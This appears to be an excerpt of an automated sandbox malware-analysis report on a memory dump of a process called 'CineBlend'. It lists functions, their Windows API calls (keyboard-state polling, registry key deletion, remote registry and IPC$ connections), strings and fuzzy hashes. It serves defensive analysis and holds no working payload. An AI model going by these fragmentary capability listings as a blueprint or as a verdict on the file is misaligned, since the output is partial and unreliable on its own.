Instruction Fuzzy Hash: A891F471144B06AFDB26CF24C891FAAB7E9FF14300F1045B9FA8A82191EB31ED55CB91

Function 00BC976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B3249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00B324B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00BC97B6
GetFocus.USER32 ref: 00BC97C6
GetDlgCtrlID.USER32(00000000), ref: 00BC97D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00BC9879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00BC992B
GetMenuItemCount.USER32(?), ref: 00BC9948
GetMenuItemID.USER32(?,00000000), ref: 00BC9958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00BC998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00BC99CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00BC99FD

Strings

0, xrefs: 00BC98FB

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: d5fbe17538b9b617fb90a67bf47a0c2fa5d8e96d067979c761c285aba42c44e5
Instruction ID: 82a6ddb2da016a9711057b090d9b200a9769e9c1b7773acf74aedee9f79c91ad
Opcode Fuzzy Hash: d5fbe17538b9b617fb90a67bf47a0c2fa5d8e96d067979c761c285aba42c44e5
Instruction Fuzzy Hash: 48818D715043019FEB10CF24D888FABBBE8FB89754F1409ADF995A7291DB70D905CBA2

Function 00B9C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00C029C0,000000FF,00000000,00000030), ref: 00B9C973
SetMenuItemInfoW.USER32(00C029C0,00000004,00000000,00000030), ref: 00B9C9A8
Sleep.KERNEL32(000001F4), ref: 00B9C9BA
GetMenuItemCount.USER32(?), ref: 00B9CA00
GetMenuItemID.USER32(?,00000000), ref: 00B9CA1D
GetMenuItemID.USER32(?,-00000001), ref: 00B9CA49
GetMenuItemID.USER32(?,?), ref: 00B9CA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00B9CAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B9CAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B9CB0C

Strings

0, xrefs: 00B9C904

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 59e8b97543ea0f84cbc5921128f5db5ef4dae7b2b786a1e63ec55869fd632b39
Instruction ID: c60acef4524aacde1ea0f9996b618ddcc706cfbadfad3fb880cfc564c59319ad
Opcode Fuzzy Hash: 59e8b97543ea0f84cbc5921128f5db5ef4dae7b2b786a1e63ec55869fd632b39
Instruction Fuzzy Hash: B3616D70900259AFDF11CF64D989EEEBFE9FB09348F1440A5E951A3251DB34AD05CB61

Function 00B9E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B9E4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B9E4FA
_wcslen.LIBCMT ref: 00B9E504
_wcsstr.LIBVCRUNTIME ref: 00B9E554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B9E570

Strings

04090000, xrefs: 00B9E5A6
%u.%u.%u.%u, xrefs: 00B9E64E
DefaultLangCodepage, xrefs: 00B9E5D3
\VarFileInfo\Translation, xrefs: 00B9E568
StringFileInfo\, xrefs: 00B9E543

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 1939486746-1459072770
Opcode ID: d839fc06348b522fd67253e796f4103b5b077986e63071e01f6120864e9f731c
Instruction ID: 8d7349a8dba8e1ef25cd0e76eb50a1a2a11f1c956eb60c4905c7e227de385926
Opcode Fuzzy Hash: d839fc06348b522fd67253e796f4103b5b077986e63071e01f6120864e9f731c
Instruction Fuzzy Hash: D6410172644208BAEB00AB648C47FBF77ECDF65712F1000EAFD00A6092EF74DA05D2A5

Function 00BBD694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00BBD6C4
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00BBD6ED
FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00BBD7A8

Part of subcall function 00BBD694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00BBD70A
Part of subcall function 00BBD694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00BBD71D
Part of subcall function 00BBD694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00BBD72F
Part of subcall function 00BBD694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00BBD765
Part of subcall function 00BBD694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00BBD788

RegDeleteKeyW.ADVAPI32(?,?), ref: 00BBD753

Strings

RegDeleteKeyExW, xrefs: 00BBD729
advapi32.dll, xrefs: 00BBD718

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 05c25763a8e73b4bce1ebca7692f002120031cf869f699404da5b3a429a1e118
Instruction ID: dbdb300bcea88219563b1d05bfc0bcdee43afce7a1102c3c8a6a4d89bc4b1380
Opcode Fuzzy Hash: 05c25763a8e73b4bce1ebca7692f002120031cf869f699404da5b3a429a1e118
Instruction Fuzzy Hash: DF316F75A01129BBDB219B91DC88EFFBBBCEF45750F0001A5B905E3150EF789E45DAA0

Function 00B9EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00B9EFCB

Part of subcall function 00B4F215: timeGetTime.WINMM(?,?,00B9EFEB), ref: 00B4F219

Sleep.KERNEL32(0000000A), ref: 00B9EFF8
EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00B9F01C
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B9F03E
SetActiveWindow.USER32 ref: 00B9F05D
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B9F06B
SendMessageW.USER32(00000010,00000000,00000000), ref: 00B9F08A
Sleep.KERNEL32(000000FA), ref: 00B9F095
IsWindow.USER32 ref: 00B9F0A1
EndDialog.USER32(00000000), ref: 00B9F0B2

Strings

BUTTON, xrefs: 00B9F030

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: f3e034e9aab28b6106e6c144ca0e3814fc89e604050b8513405bda022ffb3159
Instruction ID: df8a304223bb8cb54772500258196d2e8295e0bb5fcb8b9f2524630eed8c3ae8
Opcode Fuzzy Hash: f3e034e9aab28b6106e6c144ca0e3814fc89e604050b8513405bda022ffb3159
Instruction Fuzzy Hash: 1D217979200246BFEB106F30AC89F3ABBAEFB49755B050076F60593272CF728C00DA21

Function 00B9F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B9F374
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B9F38A
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B9F39B
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B9F3AD
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B9F3BE

Strings

play PlayMe, xrefs: 00B9F3B9
alias PlayMe, xrefs: 00B9F34D
status PlayMe mode, xrefs: 00B9F36F
open , xrefs: 00B9F323
close PlayMe, xrefs: 00B9F385, 00B9F3B2
play PlayMe wait, xrefs: 00B9F3A8

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 25679cfbffb15eb7618a5c95eb172c7fbd817bec3146f9f0dec3a023b2eaf6f3
Instruction ID: cd0e04cae845aa03b425079c1f250c02438ef6db19be5b4de7a17fcc5c576999
Opcode Fuzzy Hash: 25679cfbffb15eb7618a5c95eb172c7fbd817bec3146f9f0dec3a023b2eaf6f3
Instruction Fuzzy Hash: 00119131A9415D79DB20A775DC4AEFF7AFCEB92B50F5044FA7901E30E0EEA05908C5A0

Function 00B9A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00B9A9D9
SetKeyboardState.USER32(?), ref: 00B9AA44
GetAsyncKeyState.USER32(000000A0), ref: 00B9AA64
GetKeyState.USER32(000000A0), ref: 00B9AA7B
GetAsyncKeyState.USER32(000000A1), ref: 00B9AAAA
GetKeyState.USER32(000000A1), ref: 00B9AABB
GetAsyncKeyState.USER32(00000011), ref: 00B9AAE7
GetKeyState.USER32(00000011), ref: 00B9AAF5
GetAsyncKeyState.USER32(00000012), ref: 00B9AB1E
GetKeyState.USER32(00000012), ref: 00B9AB2C
GetAsyncKeyState.USER32(0000005B), ref: 00B9AB55
GetKeyState.USER32(0000005B), ref: 00B9AB63

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: ca71669549ce072149efc0e307eb2bf5d64f2db4c12065d0bd4c9b740df1815a
Instruction ID: b3827bf969c181af8516c743c3b8fa19771e988b736ce74bd10d1f9082eb86a3
Opcode Fuzzy Hash: ca71669549ce072149efc0e307eb2bf5d64f2db4c12065d0bd4c9b740df1815a
Instruction Fuzzy Hash: 2D51D520A047882AFF35D7648950BAABFF5DF11340F0945F9D5C25B1C2DA649B4CC7A3

Function 00B9662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00B96649
GetWindowRect.USER32(00000000,?), ref: 00B96662
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00B966C0
GetDlgItem.USER32(?,00000002), ref: 00B966D0
GetWindowRect.USER32(00000000,?), ref: 00B966E2
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00B96736
GetDlgItem.USER32(?,000003E9), ref: 00B96744
GetWindowRect.USER32(00000000,?), ref: 00B96756
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00B96798
GetDlgItem.USER32(?,000003EA), ref: 00B967AB
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00B967C1
InvalidateRect.USER32(?,00000000,00000001), ref: 00B967CE

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: 6d1c6c0cc28f86bbd144ffe6c163383124383627734b855253e4bd0b1385b650
Instruction ID: 0f6d2bb860739df01885d5d063d776ddcc495401589cc3287be8f2570433ac4d
Opcode Fuzzy Hash: 6d1c6c0cc28f86bbd144ffe6c163383124383627734b855253e4bd0b1385b650
Instruction Fuzzy Hash: 3F511F75A00205AFDF18CFA8DD85AAEBBB5FB48315F108179F919E7290DB74AD04CB60

Function 00B3146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00B31802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B31488,?,00000000,?,?,?,?,00B3145A,00000000,?), ref: 00B31865

DestroyWindow.USER32(?), ref: 00B31521
KillTimer.USER32(00000000,?,?,?,?,00B3145A,00000000,?), ref: 00B315BB
DestroyAcceleratorTable.USER32(00000000), ref: 00B729B4
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00B3145A,00000000,?), ref: 00B729E2
ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00B3145A,00000000,?), ref: 00B729F9
ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00B3145A,00000000), ref: 00B72A15
DeleteObject.GDI32(00000000), ref: 00B72A27

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 7cfde60f976b9afe7617939ebd157d80de551eec5a14b32019ba53fac8e78475
Instruction ID: ecfe8bfb2d2b138c37e93ff47dec4ac6565dc04ace65feb663192d3b12f46848
Opcode Fuzzy Hash: 7cfde60f976b9afe7617939ebd157d80de551eec5a14b32019ba53fac8e78475
Instruction Fuzzy Hash: 61617835501701DFDB399F18D988B2AB7F9FB94322F2188A9E04797660CB70AC90CF80

Function 00B32128 Relevance: 18.1, APIs: 12, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 00B32234: GetWindowLongW.USER32(?,000000EB), ref: 00B32242

GetSysColor.USER32(0000000F), ref: 00B32152

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 53cc84adfca737c7a5810ce4a4e303be56423d29e1b81f366586ce0ad10f372e
Instruction ID: 8f49326697accceaef30eb80a1a723bee71d836de928e07fd6342b0df34de0fc
Opcode Fuzzy Hash: 53cc84adfca737c7a5810ce4a4e303be56423d29e1b81f366586ce0ad10f372e
Instruction Fuzzy Hash: 98419435100A40AFDB205F38DC84FB937E5EB56B21F254295FAB6A72E1CB319D42EB11

Function 00B9A05C Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000001,?,00B80D31,00000001,0000138C,00000001,00000001,00000001,?,00BAEEAE,00C02430), ref: 00B9A091
LoadStringW.USER32(00000000,?,00B80D31,00000001), ref: 00B9A09A

Part of subcall function 00B3B329: _wcslen.LIBCMT ref: 00B3B333

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,00B80D31,00000001,0000138C,00000001,00000001,00000001,?,00BAEEAE,00C02430,?), ref: 00B9A0BC
LoadStringW.USER32(00000000,?,00B80D31,00000001), ref: 00B9A0BF
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B9A1E0

Strings

^ ERROR, xrefs: 00B9A175
Error: , xrefs: 00B9A197
Line %d:, xrefs: 00B9A11A
%s (%d) : ==> %s: %s %s, xrefs: 00B9A1C4
Line %d (File "%s"):, xrefs: 00B9A109

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: ad2d441e0a22509e1d625ff9b9c1a67314f91c21e70dcd480bd1204edac3cb61
Instruction ID: 5fd4067136c0eda3277949375c2d782bdbab85cc6f21bb8a76a9f31db3eeb757
Opcode Fuzzy Hash: ad2d441e0a22509e1d625ff9b9c1a67314f91c21e70dcd480bd1204edac3cb61
Instruction Fuzzy Hash: 26413372840119AACF05EBE0DD86DEEB7B8AF14340F6040E5B601B6092EF755F49CBA1

Function 00B90FCF Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00B38577: _wcslen.LIBCMT ref: 00B3858A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00B91093
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00B910AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00B910CB
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00B910F5
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 00B9111D
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B91128
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00B9112D

Strings

SOFTWARE\Classes\, xrefs: 00B90FFF
\CLSID, xrefs: 00B91015
\IPC$, xrefs: 00B91075

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: 994adfbba826fca1eea9ed43ab14a48c0b79e351948fbdf23624ae38eac076d1
Instruction ID: 4b99fac1840c9d8470eed9327df29a35cdbf2636ad5c7e0a67553e92fc67a262
Opcode Fuzzy Hash: 994adfbba826fca1eea9ed43ab14a48c0b79e351948fbdf23624ae38eac076d1
Instruction Fuzzy Hash: 26410776C1022DABCF15EBA4DC95DEEB7B8FF08740F1084A9EA01A3160EB719E04CB50

Function 00BC4A34 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00BC4AD9
CreateCompatibleDC.GDI32(00000000), ref: 00BC4AE0
SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00BC4AF3
SelectObject.GDI32(00000000,00000000), ref: 00BC4AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00BC4B06
DeleteDC.GDI32(00000000), ref: 00BC4B10
GetWindowLongW.USER32(?,000000EC), ref: 00BC4B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00BC4B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00BC4B3C

Strings

static, xrefs: 00BC4A71

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BF3000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059205849.0000000000BFD000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2059231494.0000000000C05000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_b30000_CineBlend.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 4acd6c93c12caa391e5367dc8f6591dc3b985865585d80e70101a1c3c089a68e
Instruction ID: f8e1e206fc8c48b81738d24000ce302015dea8ddcdb1ef4023ad9dd50f5f3d2a
Opcode Fuzzy Hash: 4acd6c93c12caa391e5367dc8f6591dc3b985865585d80e70101a1c3c089a68e
Instruction Fuzzy Hash: 2E316C36140215BBDF219FA4DC08FDA3BA9FF0D324F110269FA15A61A0CB75DD60DBA4

Function 00BB468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00BB46B9
CoInitialize.OLE32(00000000), ref: 00BB46E7
CoUninitialize.OLE32 ref: 00BB46F1
_wcslen.LIBCMT ref: 00BB478A
GetRunningObjectTable.OLE32(00000000,?), ref: 00BB480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00BB4932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00BB496B
CoGetObject.OLE32(?,00000000,00BD0B64,?), ref: 00BB498A
SetErrorMode.KERNEL32(00000000), ref: 00BB499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BB4A21
VariantClear.OLEAUT32(?), ref: 00BB4A35

Memory Dump Source

Source File: 00000024.00000002.2058880605.0000000000B31000.00000020.00000001.01000000.00000011.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.2058844903.0000000000B30000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000024.00000002.2058970998.0000000000BCD000.00000002.00000001.01000000.00000011.sdmpDownload File
